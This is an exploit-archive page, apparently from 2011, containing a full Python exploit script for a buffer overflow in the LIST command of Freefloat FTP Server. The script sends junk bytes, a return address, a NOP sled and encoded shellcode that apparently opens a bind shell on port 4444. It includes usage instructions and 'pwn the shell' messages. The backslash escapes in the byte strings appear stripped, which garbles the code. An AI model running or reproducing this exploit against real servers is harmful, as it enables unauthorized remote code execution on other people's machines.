Home / exploitsPDF  

Freefloat FTP Buffer Overflow

Posted on 12 July 2011

#!/usr/bin/python
from struct import pack
import socket,sys
import os

print " ||=============================================================||"
print " ||                                                             ||"
print " ||      /          0-Exploit (Zer0 Thunder)                   ||"
print " ||       ,,  /  /--------------------------------------------||"
print " ||    '-.`()/`.-'          ===========================        ||"
print " ||   .--_'(  )'_--.Freefloat FTP [LIST] Buffer Overflow Exploit||"
print " ||  / /` /`**` `         ----pwn the shell----              ||"
print " ||   |  |  ><  |  |                                            ||"
print " ||           /  /                                            ||"
print " ||       '.__.'                                                ||"
print " ||                                                             ||"
print " ||=============================================================||"

if len(sys.argv) != 3:
print "Usage: ./freeftp.py [IP] [PORT]"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

junk = "x41" * 246
add = pack('<L',0x77c35459)
nops = "x90" * 20
shell= ("x33xc9x83xe9xaaxe8xffxffxffxffxc0x5ex81x76x0e"
"xbbxc1x9cx35x83xeexfcxe2xf4x47x29x15x35xbbxc1"
"xfcxbcx5exf0x4ex51x30x93xacxbexe9xcdx17x67xaf"
"x4axeex1dxb4x76xd6x13x8ax3exadxf5x17xfdxfdx49"
"xb9xedxbcxf4x74xccx9dxf2x59x31xcex62x30x93x8c"
"xbexf9xfdx9dxe5x30x81xe4xb0x7bxb5xd6x34x6bx91"
"x17x7dxa3x4axc4x15xbax12x7fx09xf2x4axa8xbexba"
"x17xadxcax8ax01x30xf4x74xccx9dxf2x83x21xe9xc1"
"xb8xbcx64x0exc6xe5xe9xd7xe3x4axc4x11xbax12xfa"
"xbexb7x8ax17x6dxa7xc0x4fxbexbfx4ax9dxe5x32x85"
"xb8x11xe0x9axfdx6cxe1x90x63xd5xe3x9exc6xbexa9"
"x2ax1ax68xd3xf2xaex35xbbxa9xebx46x89x9exc8x5d"
"xf7xb6xbax32x44x14x24xa5xbaxc1x9cx1cx7fx95xcc"
"x5dx92x41xf7x35x44x14xccx65xebx91xdcx65xfbx91"
"xf4xdfxb4x1ex7cxcax6ex48x5bx04x60x92xf4x37xbb"
"xd0xc0xbcx5dxabx8cx63xecxa9x5exeex8cxa6x63xe0"
"xe8x96xf4x82x52xf9x63xcax6ex92xcfx62xd3xb5x70"
"x0ex5ax3ex49x62x32x06xf4x40xd5x8cxfdxcax6exa9"
"xffx58xdfxc1x15xd6xecx96xcbx04x4dxabx8ex6cxed"
"x23x61x53x7cx85xb8x09xbaxc0x11x71x9fxd1x5ax35"
"xffx95xccx63xedx97xdax63xf5x97xcax66xedxa9xe5"
"xf9x84x47x63xe0x32x21xd2x63xfdx3exacx5dxb3x46"
"x81x55x44x14x27xc5x0ex63xcax5dx1dx54x21xa8x44"
"x14xa0x33xc7xcbx1cxcex5bxb4x99x8exfcxd2xeex5a"
"xd1xc1xcfxcax6exc1x9cx35")
payload = junk+add+nops+shell

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
connect=s.connect((target, port))
print "[+] Target FTP Connected!"
except:
print "[!] FTP didn't respond
"
sys.exit(0)

s.recv(1024)


s.send('USER anonymous
')
s.recv(1024)
s.send('PASS anonymous
')
s.recv(1024)
print "[+] Sending payload..."
s.send('LIST ' + payload + '
')
s.recv(1024)

print "[!] Exploit has been sent!. Please try telnet [target ip] 4444
"

try:
s.recv(1024)
print "[!] Exploit failed !."

except:
print "[+] Pwned the shell !"

s.close()

 

TOP

Malware :

Exploits :